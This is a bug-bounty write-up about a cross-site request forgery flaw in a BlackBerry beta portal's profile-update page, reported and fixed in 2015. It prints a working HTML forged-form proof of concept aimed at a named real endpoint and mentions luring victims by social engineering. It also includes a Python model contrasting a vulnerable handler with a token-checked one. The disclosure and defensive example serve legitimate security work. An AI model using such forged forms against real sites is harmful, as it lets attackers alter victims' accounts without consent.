CSRF bug in Blackberry To Update All Users Profile



Hello everyone,

This is my first write-up, and I would like to start it with the CSRF vulnerability that I found recently in a BlackBerry domain. By using this bug I was able to change any user's profile information ;)

Introduction:-

A few months back, I gave a presentation on Cross-Site Request Forgery at the Null Mumbai chapter meet; you can find my slides here: Its all about CSRF. I also gave a seminar explaining various ways to bypass CSRF tokens.
All this motivated me to research CSRF bugs and their bypass techniques further, and I started digging deeper to find these types of bugs.



So here is how my first experience went...

About BlackBerry Beta Zone: the site says it has 400,000 members and growing!

I started doing my security research on BlackBerry. While checking this portal for bugs, I came across the user profile details page, where no protection against CSRF had been set.
This means that by using this bug I could change all users' profile information.

Now for me it's like having a cup of tea :P




Proof Of Concept:-

This attack works by sending a crafted request to the victim, who then has to click on it.
So I crafted the forged HTML request below.

<html>
  <body>
    <!-- Attacker-hosted page: the victim's browser submits this POST to the profile
         endpoint and attaches the victim's own session cookie. Field names and values
         are as captured from the profile form; the formKey is a fixed value. -->
    <form action="https://beta.webapps.blackberry.com/profiles/update/1301" method="POST">
      <input type="hidden" name="formKey" value="b60252de0a9e6c85fd78c480dc736562aba3c11c9ba5f27d0e4ebe8decc827b9" />
      <input type="hidden" name="formPageId" value="5190" />
      <input type="hidden" name="data[person][name_first]" value="Hacked_By_Nilesh" />
      <input type="hidden" name="data[person][name_last]" value="Hackerz are here" />
      <input type="hidden" name="data[location][city]" value="mumbai" />
      <input type="hidden" name="data[location][country_id]" value="183" />
      <input type="hidden" name="quest_572" value="1729" />
      <input type="hidden" name="quest_577" value="" />
      <input type="hidden" name="quest_380" value="781" />
      <input type="hidden" name="quest_381" value="790" />
      <input type="hidden" name="check_387[]" value="819" />
      <input type="hidden" name="applybtn" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
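The formKey field in the PoC above is a fixed value copied from a captured request, and the write-up shows that submitting it from another site still updated the victim's profile. The example below is added for this page and is not BlackBerry's code: it models the update endpoint in Python with a constructed in-memory session store and the PoC's own field names. The unprotected handler accepts the forged form because the browser attaches the victim's session cookie to the cross-site POST; the hardened handler requires an unguessable token bound to the victim's session (which an attacker page cannot read, because of the same-origin policy) and, as defence in depth, checks the Origin header against an assumed allowed origin.

```python
"""Synchronizer-token CSRF check for a profile-update endpoint (added example).

Constructed model, not the vendor's code: a session id stands in for the session
cookie, SESSIONS and PROFILES are in-memory dicts, and the allowed origin is an
assumption taken from the PoC's form action.
"""
import hmac
import secrets

# session_id -> {"user_id": ..., "csrf_token": ...}   (constructed store)
SESSIONS = {}
# user_id -> profile record                             (constructed sample data)
PROFILES = {1301: {"name_first": "Alice", "name_last": "Example", "city": "Waterloo"}}
ALLOWED_ORIGIN = "https://beta.webapps.blackberry.com"  # assumed site origin

# Only these POST fields may write to the profile; the keys mirror the PoC form.
WRITABLE_FIELDS = {
    "data[person][name_first]": "name_first",
    "data[person][name_last]": "name_last",
    "data[location][city]": "city",
}


def create_session(user_id):
    """Log a user in: mint a session id and a fresh, unguessable token bound to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user_id": user_id, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """The value the legitimate profile page embeds as a hidden field when it renders."""
    return SESSIONS[sid]["csrf_token"]


def _apply(session, form):
    """Copy whitelisted fields from the POST body onto the session owner's profile."""
    record = PROFILES.setdefault(session["user_id"], {})
    record.update({dest: form[src] for src, dest in WRITABLE_FIELDS.items() if src in form})
    return 200, "updated"


def update_profile_unprotected(sid, form):
    """Vulnerable shape: any POST arriving with a valid session cookie is applied.
    A cross-site form post carries the victim's cookie automatically, so it succeeds."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    return _apply(session, form)


def update_profile_protected(sid, form, origin=None):
    """Hardened shape: the POST must carry the token bound to this session, and a
    present Origin header must match the site. A static, shared formKey like the one
    in the PoC would not satisfy this check, since it is not tied to the session."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    submitted = form.get("csrf_token", "")
    # constant-time comparison, so the check does not leak the token byte by byte
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return 403, "csrf token missing or invalid"
    if origin is not None and origin != ALLOWED_ORIGIN:
        return 403, "cross-origin request refused"
    return _apply(session, form)


# Constructed forged form in the shape of the PoC: a copied static formKey but no
# per-session token, because the attacker never sees the victim's token.
FORGED_FORM = {
    "formKey": "static-value-copied-by-attacker",
    "data[person][name_first]": "Hacked",
    "data[person][name_last]": "Via CSRF",
    "data[location][city]": "mumbai",
}


def demo():
    """Run the forged form against both handlers, then a legitimate form against the
    hardened one. Returns the status codes and the final profile for inspection."""
    victim = create_session(1301)
    before = dict(PROFILES[1301])
    unprotected, _ = update_profile_unprotected(victim, FORGED_FORM)   # 200: profile overwritten
    PROFILES[1301] = dict(before)                                      # reset for the next run
    forged, _ = update_profile_protected(victim, FORGED_FORM, origin="https://attacker.example")
    legit_form = {"csrf_token": csrf_token_for(victim), "data[location][city]": "Toronto"}
    legit, _ = update_profile_protected(victim, legit_form, origin=ALLOWED_ORIGIN)
    return {"unprotected": unprotected, "forged": forged, "legit": legit,
            "profile": dict(PROFILES[1301])}


if __name__ == "__main__":
    print(demo())
```

The token is minted per session and compared in constant time; a token belonging to a different session, an empty token, or the static formKey alone is rejected. Browsers that support the SameSite cookie attribute give a further layer today, but the server-side token check is what makes a forged form unusable regardless of the victim's browser.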


BEFORE:- Victim account information



AFTER:- Victim account details changed after clicking on the request sent by the attacker



So I wrote a nice mail to the BlackBerry security team explaining this issue. After I reported it, the BlackBerry security team was not able to find my report :(



At last, after exchanging a few mails with the BlackBerry security team, I got a reply.




I am happy that they patched this bug so quickly, and here I got this HOF (Hall Of Fame) :D

Hall Of Fame:- 



Video POC:-

Below is the video PoC demonstration of this attack: (Enjoy the music ;))



Time-Line:-

July 12, 2015 at 5:43 PM : Reported to vendor (BlackBerry Team)
July 15, 2015 at 1:45 AM : Received initial reply from BlackBerry Team
July 30, 2015 at 2:30 AM : BlackBerry Team released a quick fix for the vulnerability
Aug 10, 2015 at 6:30 PM : Public responsible disclosure

7 comments

Anonymous, 9 August 2015 at 10:01:

Great finding, but how can you update all user profiles using a single click? :P

Reply, 9 August 2015 at 10:20:

Hi, thank you.... Well, it's a CSRF bug, so user interaction is required to successfully execute this attack. So the victim has to click on the request sent by the attacker, and to do this we generally use social engineering.